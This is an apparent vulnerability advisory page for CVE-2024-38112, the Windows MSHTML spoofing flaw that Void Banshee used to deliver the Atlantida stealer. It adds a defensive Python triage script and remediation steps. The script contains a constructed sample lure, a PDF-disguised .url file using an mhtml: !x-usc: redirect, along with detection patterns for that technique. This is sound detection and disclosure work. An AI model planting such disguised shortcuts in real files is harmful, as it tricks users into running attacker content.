CVE-2024-38112 — Microsoft Windows MSHTML Platform Spoofing Vulnerability

CVE-2024-38112

Windows MSHTML — Zero-Day .url File Trick Forces Internet Explorer to Render Attacker Content via jscript9.dll; Void Banshee APT Deployed Atlantida Stealer

What is the Windows MSHTML Platform?

MSHTML (also called Trident) is the legacy HTML rendering engine originally built for Internet Explorer and now retained as a Windows system component. Despite Internet Explorer's retirement, MSHTML ships with every supported Windows version and can still be reached through the mhtml: URL protocol handler, through Windows shell processing of Internet Shortcut (.url) files, and through the WebBrowser control embedded in other applications. MSHTML and its scripting engine (jscript9.dll) are a recurring exploitation target because they are an older, less hardened code surface that remains reachable from modern Windows, including from innocuous-looking .url shortcut files that the user never expects to open a browser at all.

Overview

CVE-2024-38112 is a spoofing vulnerability in the Windows MSHTML platform that was exploited as a zero-day by the Void Banshee APT to silently open Internet Explorer and execute malicious content through jscript9.dll. Attackers distributed crafted .url files that appeared to be PDF documents; when opened, the shortcut's mhtml: URL caused Windows to launch the retired Internet Explorer process rather than the default browser and load an attacker-controlled page that abused the legacy scripting engine. Haifei Li of Check Point Research discovered the in-the-wild exploitation and reported it to Microsoft; Microsoft patched it on July 9, 2024, and CISA added it to the Known Exploited Vulnerabilities catalog the same day. A second flaw in the same attack chain (CVE-2024-43461) was patched later, in September 2024.

Affected Versions

OS                                      Status
Windows 10 (all supported versions)     Patched, July 2024 Patch Tuesday
Windows 11 (all supported versions)     Patched, July 2024 Patch Tuesday
Windows Server 2008 R2 and later        Patched, July 2024 Patch Tuesday

Technical Details

CWE-451 (User Interface (UI) Misrepresentation of Critical Information). The attack exploited the gap between what Windows shows the user and what actually runs when the file is opened. Crafted .url shortcut files were disguised as PDF documents through icon selection (the IconFile field pointing at a document application's icon) and file naming tricks such as a double extension. The shortcut's URL= field began with the mhtml: protocol handler and used an !x-usc: sub-URL, which caused the Windows shell to bypass the default browser and hand the URL to Internet Explorer, a process that appears to be disabled but still exists on the system.

Once Internet Explorer loaded the attacker-controlled URL through MSHTML, the legacy jscript9.dll scripting engine processed JavaScript content. Void Banshee used this to deliver and execute the Atlantida information stealer, which targets credentials stored in browsers, crypto wallet files, and application data.
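The following Python script is an added example for this page, not code from the advisory, Microsoft, or the researchers it cites. It statically triages Internet Shortcut (.url) files for the lure pattern described above: an mhtml: scheme, the !x-usc: redirection, an icon borrowed from a document application, and a double extension. The shortcut contents are constructed samples; the hostname example.com, the IconFile path, and the DOCUMENT_ICON_HINTS list are assumptions for illustration, not real indicators from the campaign.

```python
"""Triage Windows Internet Shortcut (.url) files for the CVE-2024-38112
lure pattern: an mhtml: URL that forces the shortcut to open in the retired
Internet Explorer engine, dressed up to look like a PDF.

Added example for this page; not code from the advisory or any vendor.
All shortcut contents below are constructed samples.
"""
import configparser
import re
from dataclasses import dataclass, field

# URL schemes that make the Windows shell hand a shortcut to Internet
# Explorer / MSHTML instead of the default browser.
IE_FORCING_SCHEMES = ("mhtml:",)

# Executables whose icons make a .url look like a document. This list is an
# assumption for the example; extend it to match your environment.
DOCUMENT_ICON_HINTS = ("acrord32", "acrobat", "winword", "excel", "powerpnt")


@dataclass
class UrlFinding:
    filename: str
    url: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style [InternetShortcut] section of a .url file.

    Returns a dict with lower-cased keys (configparser lower-cases keys by
    default, which matches the shell's case-insensitive handling), or an
    empty dict if the text is not a parsable shortcut.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def triage(filename: str, text: str) -> UrlFinding:
    """Return a finding listing every lure indicator present in the file."""
    fields = parse_internet_shortcut(text)
    url = fields.get("url", "")
    finding = UrlFinding(filename=filename, url=url)
    low = url.lower()

    # 1. Scheme that pulls in Internet Explorer / MSHTML.
    if low.startswith(IE_FORCING_SCHEMES):
        finding.reasons.append("URL uses mhtml: scheme (opens in Internet Explorer)")

    # 2. The mhtml '!x-usc:' sub-URL redirects IE to a second URL; a benign
    #    shortcut has no reason to carry one.
    if "!x-usc:" in low:
        finding.reasons.append("mhtml '!x-usc:' redirection to a second URL")

    # 3. Icon borrowed from a document application so the file looks like a PDF.
    icon = fields.get("iconfile", "").lower()
    if any(hint in icon for hint in DOCUMENT_ICON_HINTS):
        finding.reasons.append(f"icon taken from a document application: {icon}")

    # 4. 'report.pdf.url' displays as 'report.pdf' when extensions are hidden.
    if re.search(r"\.(pdf|docx?|xlsx?)\.url$", filename, re.IGNORECASE):
        finding.reasons.append("double extension hides .url behind a document name")

    return finding


# Constructed samples. example.com and the icon path are placeholders.
LURE = """[InternetShortcut]
URL=mhtml:http://example.com/lure.html!x-usc:http://example.com/lure.html
ShowCommand=7
IconIndex=13
IconFile=C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe
"""

BENIGN = """[InternetShortcut]
URL=https://example.com/intranet
IconIndex=0
IconFile=C:\\Windows\\System32\\shell32.dll
"""


def scan(samples: dict) -> list:
    """Triage a mapping of filename -> file contents."""
    return [triage(name, text) for name, text in samples.items()]


if __name__ == "__main__":
    for f in scan({"Q2-report.pdf.url": LURE, "intranet.url": BENIGN}):
        print(f"{f.filename}: {'SUSPICIOUS' if f.suspicious else 'ok'}")
        for reason in f.reasons:
            print("   -", reason)
```

Any single indicator is worth a look, but the mhtml: scheme and the !x-usc: redirection are the ones that matter most: a legitimate Internet Shortcut dropped by a user or an installer almost never needs either, so they make a low-noise hunting rule across file shares and mail quarantine.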

The user-interaction requirement (the victim must open the disguised .url file) is captured by UI:R in the vector; the High Attack Complexity (AC:H) reflects the additional preparation an attacker needs beyond simply delivering the file. The Void Banshee campaign showed that both conditions were achievable at scale through phishing.

Discovery

Discovered by Haifei Li of Check Point Research, who identified exploitation in the wild in May 2024 and reported it to Microsoft. Attribution of the campaign to the Void Banshee APT group, and analysis of its Atlantida stealer payload, was published by Trend Micro's Zero Day Initiative researchers. Void Banshee targets organizations in North America, Europe, and Southeast Asia for credential theft and data exfiltration using information stealers.

Exploitation Context

Void Banshee distributed malicious .url files through phishing campaigns, archive files hosted on sharing sites, and malicious links. The spoofed-PDF shortcut approach is particularly effective because users are conditioned to open PDF files and do not expect a .url shortcut to launch Internet Explorer. The Atlantida stealer payload harvests browser credentials, autofill data, cryptocurrency wallets, and files matching document extensions — providing immediate financial and intelligence value.

The July 2024 patch closed the mhtml: path for launching Internet Explorer from a shortcut. A second flaw used in the same attack chain, CVE-2024-43461, a spoofing bug in the file name Internet Explorer displays in its download prompt, was not fixed until the September 2024 Patch Tuesday; Microsoft later noted it had been exploited before the July update as part of the same Void Banshee campaign.

Remediation

  1. Apply the July 2024 Windows security updates (Patch Tuesday, July 9, 2024); this closes the mhtml: Internet Explorer launch vector.
  2. Also apply the September 2024 Patch Tuesday update for CVE-2024-43461, the second flaw used in Void Banshee's attack chain.
  3. If mhtml: is not required for business purposes, consider restricting the protocol handler through registry policy; test first, because some applications and archived .mht files depend on it.
  4. Train users to be suspicious of .url and other shortcut files received via email or downloaded from the internet, even when they carry a document icon or a name ending in .pdf.
  5. Block or quarantine shortcut file types (.url, .lnk) and HTML application files (.hta) at email gateways and web proxies, including inside archives.

Key Details

Property              Value
CVE ID                CVE-2024-38112
Vendor / Product      Microsoft — Windows
NVD Published         2024-07-09
NVD Last Modified     2025-10-28
CVSS 3.1 Score        7.5
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Severity              HIGH
CWE                   CWE-451
CISA KEV Added        2024-07-09
CISA KEV Deadline     2024-07-30
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector         Network
Attack Complexity     High
Privileges Required   None
User Interaction      Required
Scope                 Unchanged
Confidentiality       High
Integrity             High
Availability          High

Required Action

CISA BOD 22-01 Deadline: 2024-07-30. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date          Event
2024-05-16    Haifei Li (Check Point Research) discovers exploitation of CVE-2024-38112 in the wild
2024-07-09    Microsoft releases the July 2024 Patch Tuesday update fixing CVE-2024-38112; CISA adds it to KEV the same day, confirming zero-day exploitation
2024-07-30    CISA BOD 22-01 remediation deadline